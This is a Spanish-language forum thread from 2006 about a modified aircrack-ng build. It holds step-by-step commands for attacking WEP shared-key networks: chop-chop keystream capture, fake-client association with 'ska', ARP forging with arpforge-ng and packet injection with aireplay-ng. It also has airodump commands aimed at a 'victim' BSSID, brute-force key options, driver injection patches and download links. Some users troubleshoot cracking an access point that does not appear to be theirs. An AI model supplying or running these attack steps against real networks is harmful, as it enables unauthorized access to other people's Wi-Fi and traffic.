Los comando nuevos unicamente sirven para:
-descifrar wep mediante diccionario
-utilizar multimples tarjetas para la captura de paquetes es decir puedes usar hasta 8 capturando al mismo tiempo diveros canales
-inyeccion de paquetes tipo udp..... cifrados
-bufer ciclico

tampoco es q cambien una burrada solo son simples pijadas
pero vamos yo creo q son utiles algunas veces xejemlo en vex de usar el wlandecrypter y el weplab usas aircrack+wlandecyrpter

sabia yo que se me quedaba algo en el tintero ... bueno algo  ;D ;D  .. casi todo

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: .NiXoN. en 14 Septiembre 2006, 14:39 pm
Wenas....

Hola chicos, como k toy perdio....no se si e leido mal o son imaginaciones mias pero para instalar this motherfucker.....ay que actualizar el kernel?

Saludos ! ;D


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 14 Septiembre 2006, 14:48 pm
no .NiXoN. no hace falta lo del kernel es si tienes una IPW2200 y quieres reinyectar para eso si q tienes q actualizarlo porque los nuevos controladores de la tarejta lo requieren


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: NetFree222 en 14 Septiembre 2006, 15:13 pm
Joder tio tengo ganas de probarlo pero ahora mismo no tengo una ***** de linux instalao y tampoco mucho tiempo...haber si sale algun live cd y te lo veo porke estoy de un perro...jajaja,oye has comentado tu modificacion en los foros de aircrack-ng???venga haber si tb lo incluyen en el blacktrack...
Un saludito tio


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: lobonegro en 14 Septiembre 2006, 16:18 pm
hola , primero que nada felicitar por el cambio en el programa. decir también q no posteo pero si que me mantengo bastante informado gracias al foro. este post lo escribo porque probé el mothrfucker con mi tarjeta pcmcia, la detecta muy bien, pero me dice que los drivers peek no son compatibles. es una Gemtek modelo WL-311, que viene con el kit de timofonica adsl. quería saber si puedo conseguir esos drivers, o con probar algunas versiones diferentes de peek.dll puede funcionar o tal vez cambiando el modo de mi tarjeta. nada mas, espero no ser molestia xao  :huh:


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 14 Septiembre 2006, 18:08 pm
NetFree222 el aircrack-ng motherfucker yo solo uno codigo y lo compilo en realidad como esta puesto en el programa son  modificaciones q hace la peña del foro del aircrack-ng pero q no las sacan en ninguna version oficial es decir es como si tu llegas y haces un parche porque a ti te mola q esa aplicacion haga algo en especial y otro llega y hace otro y asi sucesivamente yo lo unico q hago es coger el original he ir añadiendo las modifcaciones q hace la gente compilarlo ya sea para windows o  para linuxy probarlo como digo esas modificaciones no las veras en ningun aircrack-ng xq son modificaciones de gente como nosotros q simplemente le gusta y se las curra.X eso no creo q jamas sea incluido en bactrack o en ninguna distribucion ya q no es la oficial pero bueno a mi me gusta q sea mas tecnico y simpre q haya codigo nuevo lo unire al q ya tenemos pa sacar versiones q aunque son mas tecnicas me parecen mejores si ya sabes un poco de aircrack-ng.

lobonegrolo primero de todo tienes q saber q chip lleva tu tarjeta sin el no te puedo ayudar ya q a lo mejor es compatible pero necesitas instalar un determinado driver pero si no lo instalas jamas funcionara.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: lobonegro en 14 Septiembre 2006, 18:33 pm
Si, el chip es Prism 2 mira acá te dejo una imagen de como me lo muestra el Network strubmler.
(http://img182.imageshack.us/img182/3342/poj778bx4.th.jpg) (http://img182.imageshack.us/my.php?image=poj778bx4.jpg)

espero que sean los datos suficientes. Y sino decime si se necesita algo mas. Desde ya muchas gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 14 Septiembre 2006, 19:08 pm
pues para windows ese modelo olvidate no hay nada en cambio en linux si  es soportada prueba con algun live cd


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: NetFree222 en 14 Septiembre 2006, 19:13 pm
thefkbosspues habra que decirselo a los creadores del backtrack ;) ;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: lobonegro en 14 Septiembre 2006, 23:23 pm
Bueno, muchas 6racias por la ayuda. V0y a ver que se puede hacer o bien conseguir algn livecd de lnx 0 "rufianar" alguna tarjeta de por ahi. Es una pena porque es la tarjeta que distribuye telefónica y creo q muchos la tienen y no se puede aprovechar "al max1m0" xD
Nada mas, by3


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: unbas en 16 Septiembre 2006, 02:19 am
Soy novato en linux y sobre todo en el aircrack alguien me podia deci donde puedo encontrar un manual paa esta vesion Aircrack-ng MotherFucker Edition por q la verdad, con los tecnicismos aun ando un poco desequilibado  ;D


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 16 Septiembre 2006, 14:28 pm
pues si ya lo he añadido al principio de este post de todas formas estos son los enlace


manual aircrack-ng-0.6 original[/color] (http://hwagm.elhacker.net/htm/aircrack-ng.htm)

manual aircrack-ng-0.6 MOTHERFUCKER[/color] (http://www.seguridadwireless.net/foro/index.php/topic,490.new/boardseen.html#new)


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: unbas en 16 Septiembre 2006, 16:46 pm
Mucras gracias por los enlaces la verdad es q no los habia visto peo lo dicho muchas gracias, tanto por responder tan pronto como por dejame los enlaces

Por cierto alguien me puede decir como se instala el Aircrack-ng MotherFucker Edition version 0.3 en windows?

Aun no soy muy experto en linux, y me gusta probar las cosas q salen para guindous ...


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 disponible en breves(noticias)
Publicado por: thefkboss en 18 Septiembre 2006, 11:37 am
para windows no hace falta isntalarlo descomprimes el archivo y te vas a la carpeta bin ahi estan todos lo exe q necesitas ten encuenta q el aireplay no hay para windows asi q no podras reinyectar todo lo demas funciona igual



NOTICIAS

Pues la version 0.4 estara disponible en breves le voy a meter una utilidad mas q me parece cojonuda se llama SKA y a sido creada por ASPj y sirve para realizar ataques contra sistemas
WEP SHARED KEY asi q cojonudo no?
Eso si lo malo es q hay q hacer CHOP-CHOP asi q el q no sepa q se ponga las pilas.
tambien le puedes sacar mas utilidad tipo te puedes conectar al AP cuando no hay clientes y generar tus propios ARP validos para poder inyectar siempre y cuando haber hecho CHOP-CHOP


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 disponible en breves(noticias)
Publicado por: rh3nt0n en 18 Septiembre 2006, 15:49 pm
j***r !! que ganas de probarlo :P

aki nos tienes esperando con ansiedad  ;D ;D ;D

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 disponible en breves(noticias)
Publicado por: thefkboss en 20 Septiembre 2006, 14:03 pm
bueno haber aqui teneis un adelanto de lo q tiene explicando como hacer nuevos ataques y lo q lleva las explicaciones se recogeran mas adelante en la guia q hay para esta version.

novedades:
1º Atake contra AP con WEP SHARED WEY

basicamente la diferencia entre ope wep keyy wep shared key es q con open se puede asociar todo el mundo al AP por eso el aireplay funciona cuando se asocia una
STATION en cambio en este modo el AP le hace primero la pregunta a la STATION enviandole un paquete q este debe encryptar y devolverselo de
forma correcta el AP revisa si esta bien cifrado y si es asi le deja aosciarse.

bueno hasta aqui la teoria vamos con la practica instala el aircrack-ng motherfuker hay un programa nuevo llamado ska es digamos como el ataque 1
de asociacion sirve para eso
primeros pasos abrimos airodump-ng como siempre
ataque 4 chop-chop caputramos el  xor de momento no hace falta saber la ip ni nada de eso solo tener el archivo.
hacemos ataque 3 con el cliente falso tipico 00:11:22:33:44:55 no importa q te diga compruebe si el cliente esta conectado lo dejamos funcionando para
hacer la asociacion y obtener ARP

rapidamente ejecutamos el ska (no hace falta la velocidad del rayo)


Citar
ska ath0 "essid" bssid AP   MAC CLIENTE FALSO  replay_dec-0912-185527.xor

pues si ha salido bien ya estamos conectadoS (COMO SI FUESE ATAQUE 1) y enviando ARP mediante el aireplay q hemos abierto.



OTRAS POSIBILIDADES A PROBAR

ENVIO DE ARP GENERADOS POR NOSOTROS MISMOS con cliente falso

miramos lo de la IP del chop chop la primera q tienes q poner pon esta 192.168.1.255 (segun la q tu tengas) lo importante es el final osea el 255

bien ahora generamos nuestro ARP

Citar
arpforge-ng replay_dec-0627-022301.xor 1 MAC AP MAC CLIENTE FALSO(en nuestro caso 00:11:22:33:44:55) 192.168.0.255(acuerdate del 255al final la ip ) 192.168.0.2(vale cualquiera xq es un cliente falso pero q concuerde con la ip es decir no vale 100:120....) arp.cap

bien ya hemos creado un archivo llamado arp.cap

ahora nos asociamos


Citar
ska ath0 "essid" bssid AP   MAC CLIENTE FALSO  replay_dec-0912-185527.xor

e inyectamos nuestro arp


Citar
aireplay-ng -2 -r arp.cap -x 1000 ath0
ENVIO DE ARP GENERADOS POR NOSOTROS MISMOS con cliente autentico

miramos lo de la IP del chop chop la primera q tienes q poner pon esta 192.168.1.255 (segun la q tu tengas) lo importante es el final osea el 255
la segunda hay q poner la q te da.


Código:
arpforge-ng replay_dec-0627-022301.xor 1 MAC AP MAC CLIENTE legitimo 192.168.0.255(acuerdate del 255al final la ip ) 192.168.0.2(ip del cliente legitimo) arp.cap

e inyectamos nuestro arp

Código:
aireplay-ng -2 -r arp.cap -x 1000 ath0

tambien tenemos nueva ocpion en el aircrack-ng la -z q es fuerza bruta contra una clave alfanumerica de 64 en unas 5 horas la saca probando todas las combinaciones posibles.

tambien tenemos corregida la opcion para q algunos dispositivos wlang y prims2 entren en modo monitor
ahora podemos inyectar con las broadcom bcm43xx(teneis q aplicar el parche te hay en la carpeta patch a vuestros dirvers hay 2 versiones la q pone old y otra q pone new dependiendo de la version de vuestro controlador hay q aplicar una o otra pero el aireplay esta parcheado para soportar la inyeccion)
tambien trae la opcion de poder poner en modo monitor las IPW3945ABG nuevas


bueno hasta aqui la clase ya lo tengo terminado y lo sacare en cuantro lo pruebe y vea q no falla al compilar y se ejecuta todo correcto es decir o mañana o pasado


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 disponible en breves(noticias)
Publicado por: rh3nt0n en 20 Septiembre 2006, 18:32 pm
gracias por el curro y por las instrucciones :)

ere un mostro :P

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 disponible en breves(noticias)
Publicado por: thefkboss en 21 Septiembre 2006, 12:33 pm
bueno pues ya lo teneis

http://www.sendspace.com/file/igiz9d


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 21 Septiembre 2006, 16:56 pm
Wenas...... :-\

Haber que me entere yo.....xk eske voy un pelin perdido.....o me autopierdo....

el nuevo motherfucker......tambien sirve para otras tarjetas wireless k no sean ipw2200¿?

Eske lei en este post (cuando iban x la 1º me parece...) que necesitabas tener dicha tarjeta para funcionar esta version del aircrack, modificada por ti, thefkboss

Quizas, lei mal....o estoy en lo cierto.

Saludos !!   :-\


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 21 Septiembre 2006, 17:30 pm
haber te explico:
hablamos de la version pa linux sirve para todas las tarjetas igual q las versiones anteriores del ng normal solo q con esta version puedes utilizar las IPW2200 para inyectar ya que lleva un parche para ello ademas esta útlima q he sacao puedes inyectar tambien con las BROADCOM xq tambien lleva el pache para inyectar y ademas puedes poner en modo monitor(no inyectar) las ipw3945abg

espero q haya quedao claro alguna duda mas, preguntar q paeso estoy ::)


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 22 Septiembre 2006, 00:11 am
WEnas...

Podrian hacer un manual de esta nueva modificacion? Para que la gente se aclare con las modificaciones....estaria wapo con ejemplos y tal....no¿

Saludos !!


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 22 Septiembre 2006, 06:52 am
WEnas...

Podrian hacer un manual de esta nueva modificacion? Para que la gente se aclare con las modificaciones....estaria wapo con ejemplos y tal....no¿

Saludos !!


ya hay un avance de el manual adjunto a el que ya esta linkado en el primer post de este hilo .. solo falta que thefkboss le de el visto bueno .

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 22 Septiembre 2006, 17:37 pm
¿Se ha solucionado con este aircrack el tema de los AP's que sueltan pocos de los ultimos bits de la clave? Creo que no, no?

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 22 Septiembre 2006, 18:16 pm
el atake con buffer ciclico , opcion -g 1000000 , estaba incluido en la primera version de motherfucker ..

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 22 Septiembre 2006, 18:56 pm
Arffff perdona rh3nt0n, menuda caraja que tengo. gracias y saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: Yako_83 en 24 Septiembre 2006, 06:12 am
Con la version 0.4 no funciona bien el aireplay-ng desde el airoscript.sh
Por lo demas no me ha dado tiempo a probar mas cosas.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 24 Septiembre 2006, 08:50 am
el airoscript esta concevido  para ser usado en aircrack-ng-06 , por el momento no soporta su uso en mother fucker.

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 24 Septiembre 2006, 09:26 am
Puessss el buffer cíclico no funciona, el AP sigue sin ser vencido. He puesto la opción -g 1000000 y luego -g 2000000 y nada, sigue sin soltar de los ultimos bits.

LA sentencia q puse:

aircrack-ng ath0 -3 -b bssid -h station -x 1000 -g 1000000

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 24 Septiembre 2006, 09:35 am
Puessss el buffer cíclico no funciona, el AP sigue sin ser vencido. He puesto la opción -g 1000000 y luego -g 2000000 y nada, sigue sin soltar de los ultimos bits.

LA sentencia q puse:

aircrack-ng ath0 -3 -b bssid -h station -x 1000 -g 1000000

Saludos.

para empezar ese comando esta mal ,deberia de ser asi :

Código:
aircrack-ng -3 -b bssid -h station -x 1024 -g 1000000 ath0 

leete el manual de mother fucker ,otra vez ...
te aseguro que si funciona .

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 24 Septiembre 2006, 09:36 am
rh3nt0n, el comando está perfecto, el lugar donde pongas "ath0" es igual, y el x es el número de paquetes, que es similar.

El comando no me funciona, y si quereis cuelgo las capturas correspondientes. El AP es un Abocom con el que llevo mas de 17 millones de IV's y no lo logra, asi que temiendolo mucho tengo que decir q lo del buffer ciclico, al menos a mi, no me funciona.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 24 Septiembre 2006, 09:41 am
rh3nt0n, el comando está perfecto, el lugar donde pongas "ath0" es igual, y el x es el número de paquetes, que es similar.

El comando no me funciona, y si quereis cuelgo las capturas correspondientes. El AP es un Abocom con el que llevo mas de 17 millones de IV's y no lo logra, asi que temiendolo mucho tengo que decir q lo del buffer ciclico, al menos a mi, no me funciona.

eso es otra cosa, ya que a mi si me funciona  ;)

unas capturas siempre ayudan .

en todo caso ,siempre es posible que haya AP's que no sean vulnerables ..

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 24 Septiembre 2006, 09:47 am
Hombre ya, pero es que digo q no funciona pq si la funcion del buffer ciclico es precisamente esa, lograr bastantes iv's en los bits que los AP mas modernos no sueltan, y no es asi, pues entonces su funcionamiento no es correcto. Voy a currarme un post luego y a poneros capturas del comando, de la evolucion de las capturas y de la ejecucion del aircrack para que veais que no funciona.

Cuando dices que te funciona, ¿has probado el buffer ciclico en un AP de estas características o sencillamente dices que funciona el aircrack-ng genericamente?

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 24 Septiembre 2006, 09:52 am
lo he probado en mis AP's , y cuando antes solo tomaba unos cuantos ARP's , ahora toma miles ..

saludos 

PD:en un Abocom de esos que mencionas NO.




Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 24 Septiembre 2006, 09:57 am
 :huh: Pues el tema es ese, entonces no has probado el buffer cíclico.

En fin, luego pondre un post con capturas y tal para q lo comprobeis vosotros mismos. Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 24 Septiembre 2006, 10:08 am
:huh: Pues el tema es ese, entonces no has probado el buffer cíclico.

En fin, luego pondre un post con capturas y tal para q lo comprobeis vosotros mismos. Saludos.

pero bueno !!!!  :D  ;D ;D ;D

pa ti el pato ...

echale un vistazo a ARP request ... y saca tus conclusiones ...

(http://www.bluntmen.com/autentificado.jpg)

a mi si me rula ;) ( lo creas o no)

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 24 Septiembre 2006, 10:19 am
jajaajaj juer rh3nton que me fio de ti tio lo q pasa es q la mayor utilidad del buffer ciclico debiera ser el obtener iv's de los bits que los routers mas modernos no sueltan, y pues eso de momento segun mis pruebas no lo soluciona. Por eso pregunte ayer lo de si se habia solucionado el tema de los AP's que soltaban los iv's que querian.

Bueno a ver si alguien lo prueba en algun AP de estos problemáticos y obtiene resultados. Desde luego el AP este (Abocom) es una autentica pesadilla.

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: rh3nt0n en 24 Septiembre 2006, 10:25 am
yo es que no tengo la ¿"suerte"? de pillar AP's conflictivos .. pero el tema de que pilla muchisimos mas ARP's (diria que de una forma descontrolada  ;D ;D ;D) me parece que  es obvio ..

saludos y suerte con ese Abocom .. tarde o temprano caera .. ;)

saludos 


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: longits en 24 Septiembre 2006, 10:46 am
Si, la verdad es que inyecta y tiene una mucha mayor sensibilidad, sin dudas.

Por otra parte, acabo de descubrir quizás mi error; estoy pasando el aircrack-ng a todo lo que capture el airodump, cuando a lo mejor solo deberia pasarselo al replay.

No se, estoy experimentando a ver que tal me va. Pero desde luego que lleve ya cerca de 23 millones de IV's y no me de la clave...joer...los ingenieros de Abocom deben estar contentos...

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 24 Septiembre 2006, 16:10 pm
Haber voy a explicar todo esto para solucionar las dudas se supone q lo qu hace el fuber ciclico es enviar ARP con los vectores IVS de inializacion disitntos unos de otros es decir no hay nincuno igual q el anterior ninguno se repite en cambio en el aircrack-ng normal sin la modificacion el fuber esta puesto a 8 arp distintos y simpre ataka con esos 8 qu estan en archivo del replay la proteccion q tienen esos reouters resulta ser que se vasa en q al atakar con el mismo ARP es decir los mismos IVS iniciales todo el rato el AP se mosquea ya q tiene q responder y dice (AP CABREADO:pues estoy siendo atacado ya q nunca me envian un vetor inicial diferente siempre el mismo,JAJA) y asi solo suelta un par de los q no son importantes (bueno esto es explicado asi a la ligera) lo q hace el bufer ciclico es evitar eso ya q al no repeirse los IVS inciales pues el AP no se mosquea esto no quiere decir ni para mucho menos q vallas a sacar la clave con 1 millon quiere decir q te va a costar menos sacalra es decir si con el normal te cuesta 10 millones con este seguramente te cueste la mitad si el router hasta los 30 no suleta la clave a lo mejro con este es a los 20 pero eso depende del router.

Tambien puede pasar mas cosas porejemplo q el tio tenga un programa q cambia la clave cada cierto periodo de tiempo q estipule no me acuerdo como se llama pero existe porque me lo baje un dia para probarlo...............
o vete tu a saber a lo mejor visista este foro sabe de q va el tema y cada semana lo cambia.......

en cuanto a lo del archivo replay hay el mismo numero de ivs en ese q en el cap usando el bufer ciclico poniendo numeros altos tipo -g 100000 siempre y cuando no se haya sobrepasado el limite q le pongas ya q a pasrtir de entonces no te captura mas y se repite los ARP desde el principio


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: feddie en 25 Septiembre 2006, 03:10 am
Oigan no he visto si esta version de aircrack tiene ya los parches para prism-gt, o tengo que parchar el driver yo mismo??????


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 25 Septiembre 2006, 11:12 am
una pregunta feddie la g-650 lleva el chip prism-gt q revision es porque yo conocia estas:

g-650+ (chip TI)
G-650(CHIP ATHEROS)

con la primera solo capturas olvidate de reinyectar con la segunda capturas e inyectas.

NO SABIA q llevaban ese modelo de chip


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: feddie en 25 Septiembre 2006, 20:21 pm
Ps tengo la revision A1 que segun en una lista dice que es Prism-GT hasta a mi se me hizo raro que fuera esa ya que en casi todos lados dice que este modelo o es de la TI (Cuando tiene +) o Atheros (Disque las demas versiones, aunque en este caso ya ven que no) Ademas al ejecutar el airmon.sh me dice que si es prism asi que ni dudarlo.

Me ha ido muy bien con esta tarjeta aunque no tiene la misma recepcion de la ipw2200, la usaba para reinyectar pero ahora con este suceso de la ipw2200 la dejare para otra pc jeje.

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 26 Septiembre 2006, 10:05 am
hay una cosa jodida en la ultima version estoy solucionandolo en cuanto pueda la vuelvo a subir.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: Cosmass en 26 Septiembre 2006, 10:34 am
Pues yo tengo la DLINK DWL-G650 PCMCIARevision A1
(http://img376.imageshack.us/img376/1678/dwlg6505we.jpg)(http://img20.imageshack.us/img20/6672/mimg056nj.th.jpg) (http://img20.imageshack.us/my.php?image=mimg056nj.jpg)

Y funciona con los drivers del madwifi, en al airmon.sh sale como Atheros. Entra en modo monitor y inyecta en linux.


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 26 Septiembre 2006, 15:43 pm
vale ya he corregido los fallos ahora el airmon-ng se debe iniciar normalmente y para los q tengais las broadcom antes de compilar debeis de descomprimir el aireplay broadcom bcm43xx y sutituirlo por el aireplay-ng normal solo para los q tengais esta tarjeta sino la teneis lo hagais esto xq no funcionara


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: Hwagm en 26 Septiembre 2006, 21:23 pm
http://www.bluntmen.com/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.4.zip

la 0.4 solo hay una verdad, no es como la 3 que habia para windows, cierto?


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 26 Septiembre 2006, 21:29 pm
si de momento solo hay una es q he pensado q para q voy hacer la de win si tienen la SP q es lo mismo al español solo q sin lo de fuerza bruta q nadie va a utilizar(si seamos sinceros nadie usa todas las opciones al maximo o me equivoco).
velae pues cambio los enlaces ahora


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: Hwagm en 26 Septiembre 2006, 21:39 pm
NO te equivocas, yo pienso lo mismo, es una matada todo el dia poniendo las 2 versiones.

Vale OK, ese sera el enlace oficial de descaraga, ademas es gratis gracias a quien ya sabes, jejejejej


Yo puse el link en el index y en la zona de software de la plataforma ng.

Y ahora  a ver terminator 3, jejejej



Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 27 Septiembre 2006, 17:09 pm
Wenas !! ;D

Oye chicos con la 0.4 no se podia "monitorear" con dos tarjetas??

Si es asi como?

La sentencia que escribo para el airodump es la siguiente:

Citar
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [el_canal] --cswitch 0 ath0 rausb0

que hago mal?

Saludos !! Y gracias !! ;)

P.D:El manual esta bastante bien...solo que no estaria mal algunos ejemplos...

P.D2: Mi ipw3945 no se pone en modo monitor....no dijisteis que si? que ago mal? Ah ! utilizo Back Track (Beta, xk la final no me detecta la mi Conceptronic USB con rt 2570, y mira que le autoagrego los modulos....enfin....)



Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 27 Septiembre 2006, 18:12 pm
pues se supone q es para mas de un canal asi lo q no se si te srevira para uno solo deberia asi q prueba

tienes dos tarjetas x lo q veo la sentencias seria x ejemplo

Código:
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [1,2] --cswitch 0 ath0 rausb0
con este ejemplo se supone q la ath0 se fija al canal1 y la rausb0 al canal2 asi te deberia funcionar lo q no he probado es si poniendo 2 veces el mismo canal te la cogeria se supone q son para cnales distintos
en cuanto a lo de tu IPW3945 cuando ejecutas el airmon-ng te aparece como tarjeta es decir te la detecta ten encuenta has instalado los drivers, si abres el kismet te la reconoce ya que el airmon-ng hace uso de una parte de este


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 27 Septiembre 2006, 22:44 pm
WEnas !! ;D

Citar
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [1,2] --cswitch 0 ath0 rausb0

Ah.....vale...entonces suponiendo que mi "objetivo" escucha en el canal 3.....podria hacer esto?

Código:
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [3,3] --cswitch 0 ath0 rausb0

Kien sabe todo es posible no? O incluso me atreveria a probar esto...

Código:
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [3] --cswitch 0 ath0 rausb0

Citar
con este ejemplo se supone q la ath0 se fija al canal1 y la rausb0 al canal2 asi te deberia funcionar lo q no he probado es si poniendo 2 veces el mismo canal te la cogeria se supone q son para cnales distintos

Lo provare  ;) Ya os/te dire algo  ;)




Citar
en cuanto a lo de tu IPW3945 cuando ejecutas el airmon-ng te aparece como tarjeta es decir te la detecta

Me parece que me salia un error...cuando ejecuta el airmon-ng, no estoy seguro ya te lo dire tb.

SAludos!! y gracias !! ;D



Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 28 Septiembre 2006, 16:25 pm
Wenas !!

Citar
Me parece que me salia un error...cuando ejecuta el airmon-ng, no estoy seguro ya te lo dire tb.

Chicos...empezamos/empiezo mal....lo que yo decia era verdad...

Cuando tengo descomprimido el motherfucker, escribo:

Citar
make

Y acto seguido:

Citar
make install

Y escribo:

airmon-ng y me dice que no existe..En cambio si escribo airodump-ng, aireplay-ng, ska, etc..etc...si que van.

Al no ir el airmon-ng no se si mi ipw3945 se pone en modo monitor...

Alguien sabe xk puede fallar? Xk no se instala el airmon-ng?

SAludos !!


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 28 Septiembre 2006, 16:33 pm
si bajatelo otra vez es q te has debido bajar una version vieja q estaba dañanda la corregi ayer asi q si no te lo bajastes ayer y te lo bajaste otro dia bajatelo de nuevo

este es el q funciona:

http://www.bluntmen.com/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.4.zip


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 28 Septiembre 2006, 16:39 pm
WEnas !!

ahh vale !! po no lo sabia !! ok bajado !!! luego te cuento !!

Saludos !! ;D


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: .NiXoN. en 28 Septiembre 2006, 23:07 pm
Wenas !!!

Volvi y con no vedades !!! xDDDD a ver que empiezo...

Ah.....vale...entonces suponiendo que mi "objetivo" escucha en el canal 3.....podria hacer esto?

Citar
Código:
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [3,3] --cswitch 0 ath0 rausb0

Kien sabe todo es posible no? O incluso me atreveria a probar esto...

Código:
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [3] --cswitch 0 ath0 rausb0

Haber e provado esto vale?? y solamente me "lee" kien haya en ultimo lugar, en mi caso, rausb0:

Citar
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c [3] --cswitch 0 ath0 rausb0

Si ponemos en ultimo lugar mi ath0 leera solo la ath0.



Otra cosa, confirmo:

La sentencia es:

Citar
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c 3,3 --cswitch 0 ath0 rausb0

Pero ya digo....si, vale va cambiando de canales (en este caos nos e nota, ya que los dos canales son el 3) pero los cambia solo en la tarjeta que esta en la ultima posicion, en mi caso ya digo: rausb0.

Para que me entendais si yo pongo:

Citar
airodump-ng --ivs -w [archivo_donde_guardar] --bssid [el_bssid_de_la_victima] --c 3,4 --cswitch 0 ath0 rausb0

NO eske la ath0 escuche en el 3 y la rausb0 en el 4....si no que la rausbo(la que esta en ultimo lugar) se ira alternando entre el canal 3 y el 4....



Mas cosas...

lo del airmon-ng ya esta solcuionado, gracias x el link PERO.....mi ipw3945 no parece, no sale como modo monitor....alguna sugerencia del porke? Gracias!



Por ultimo......recomiendo que cambien el manual del motherfucker, xk el aireplay-ng no se entiende muy bien. (o me parece a mi...)

SAludos !! y gracias !!!


EDITO:

no entiendo muy bien lo que significa esto (sacado de la pagina de nuestro compañero Hwagm:
Citar
2. Echemos un vistazo a la dirección IP:
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

Esas ips de donde las saca? no s supone que para "descodificar" los paketes t tienes que saber la clave?

Si tu abrse dicho pakete con el ethereal sin saber la clave no saldran ips, pero ujna vez sabida la clave..la introduces en el ethereal y salen las ips..

Entonces como que en este atake chop-chop salen las ips? No lo entiendo...





